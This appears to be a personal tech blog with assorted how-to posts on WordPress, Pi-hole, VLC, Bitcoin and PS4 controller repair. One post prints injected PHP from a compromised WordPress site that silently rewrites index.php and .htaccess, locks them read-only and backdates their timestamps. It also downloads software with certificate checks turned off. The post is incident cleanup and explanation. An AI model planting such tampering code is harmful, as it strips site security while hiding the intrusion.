Remove WordPress page title header using custom CSS

If you’ve ever needed to remove the title header from a specific WordPress page you can do it using custom CSS. No additional plugins required.  Copy and past the code below updating “.page-id-###” to reflect the ID# of your post or page.

/* Enter your remark here about why you’ve added this custom CSS */
.page-id-### .page-header {
display: none;
}

pi-hole: change default web admin port

If you run another web server on your raspberry pi such as nginx etc you will need to change the default port “80” for your pi-hole’s web admin.

Begin by making a backup of the pi-hole lighttpd config

sudo cp /etc/lighttpd/lighttpd.conf /etc/lighttpd/lighttpd.conf.backup

Next replace the default port 80 with a port of your choice (example below uses port 8093).

sudo sed -ie ‘s/= 80/= 8093/g’ /etc/lighttpd/lighttpd.conf

Finally restart the lighttpd daemon.

sudo /etc/init.d/lighttpd restart

Connect to the pi-hole’s web admin in your browser using your newly updated port.

//192.168.x.x:8093/admin
//pi-hole.your.domain:8093/admin

PI-HOLE DNS

hacked WordPress is overwriting .htaccess

After years of quiet, faithful service my trusty little server was molested by the darkside.  A key part of my re-securing strategy involved making sure my .htaccess file was up to snuff.  I would attempt to save my newly edited .htaccess file and the editor would tell me the file had already “changed”. WTF?

If I stopped the apache2 service.. or firewalled 80 I was able to save the file,  close it.. open it.. etc and the changes stayed.. the second I unblocked 80, my .htaccess file reset itself to the basic WordPress .htaccess config.

I’d missed a compromised PHP script somewhere in the WP file system.  The uninvited code was was modifying the .htaccess file (set at 0444) to disable all the security features but leave WordPress in working condition.

“You fool! You failed to realize that, with your .htaccess is compromised, my script will tear through yours like tissue paper.”

Diff command to the rescue! In a directory above WordPress, I created a temp directory, used wget to get the latest version of WordPress then “diff” command to hunt down the rogue script. (Note: this script was written for Ubuntu.)

sudo mkdir .tmp
cd .tmp
sudo wget //wordpress.org/latest.tar.gz –no-check-certificate
sudo tar -xzvf latest.tar.gz

sudo diff -qr /var/www/webz/.tmp/wordpress /var/www/webz/wordpress |grep differ

You clever girl:

Files /var/www/webz/.tmp/wordpress/wp-includes/nav-menu.php and /var/www/webz/wordpress/wp-includes/nav-menu.php differ

Every time someone browsed my site,  it fired off a compromised version of nav-menu.php and the injected code lobotomized index.php and .htaccess. Weeeee! 🙁  If you’re curious like I was,  copy the base64 code to https://www.base64decode.org/ and decode it to plain ascii.


 

function my_correct($dir) {
$time = 0;
$path = $dir . ‘/index.php’;
$content = base64_decode(‘PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==’);
if (file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
$time = my_time($dir);
touch($path, $time);
}


 

$path = $dir . ‘/.htaccess’;
$content = base64_decode(‘IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==‘);
if (file_exists($path) AND file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
if (!$time) {
$time = my_time($dir);
}
touch($path, $time);
}
}

So no.. you’re not crazy.

Getting stated with Bitcoin

coinbase[1]The easiest service I’ve found to Buy, Store and spend bitcoins is Coinbase.com  Basically you link your checking to your coinbase account.  Once Linked you can begin buying bitcoins in amounts that suit your needs.

403 forbidden VLC 2.0.3 raspbian

I’m enabling the VLC web interface on a Raspberry Pi 2 to interface with my Smartthings home automation system.  The project is called VLC Thing and it turns a Raspberry Pi 2 running VLC into an event sound renderer.  Once you get VLC installed on your Raspberry Pi 2 using:

Sudo apt-get update
sudo apt-get install vlc

You enable the web interface by following instructions here.  At this point however VLC only allows localhost to connect (for security reasons).  To enable access to the VLC web interface from other computers, smart phones etc on your local lan, you have to edit the .hosts file that was installed with VLC.  Open a terminal instance in Raspbian and enter:

gksu leafpad /etc/vlc/lua/http/.hosts

You should see something similar to:

#
# Access-list for VLC HTTP interface
# $Id$
#

# localhost
::1
127.0.0.1

# link-local addresses
#fe80::/64

# private addresses
#fc00::/7
#fec0::/10
#10.0.0.0/8
#172.16.0.0/12
#192.168.0.0/16
#169.254.0.0/16

# The world (uncommenting these 2 lines is not quite safe)
#::/0
#0.0.0.0/0

In most cases removing the “#” before the 192.168.0.0/16 entry will enable access on your local LAN.

Repair sticking trigger buttons l2 r2 on PS4 controller

5 Pairs L2 R2 ps4 Trigger Replacement Parts
5 Pairs L2 R2 Trigger Springs Replacement Parts Buttons For PlayStation 4 PS4 Controller EveryOne-Buy

I noticed my PS4 controller’s L2 trigger was sticking.  After opening up the controller it was obvious the hinge pin that holds my L2 trigger had broken.  This in turn was causing my L2 trigger to stick.  I’m not rough with my PS4 controllers so it’s looking like someone F’d up at Sony. Yeaah! 🙁

Simply unscrew the controller and pull the back off. Watch YouTube tutorials if you’re unsure. The back is a little hard to get off but as long as you carefully and gradually pull, it will come apart. These replacement triggers fit exactly like the originals, and work perfectly.

From Amazon:

  • 5 Pairs L2 R2 Trigger Gamepad Button for PS4 controller
  • 5 Pairs L2 R2 Trigger Spring for PS4 controller
  • Professional-style textured surface,
  • Simple application takes only seconds
  • Compatible with: Sony Play Station 4 Controller;No retail package

Click here for Amazon Reviews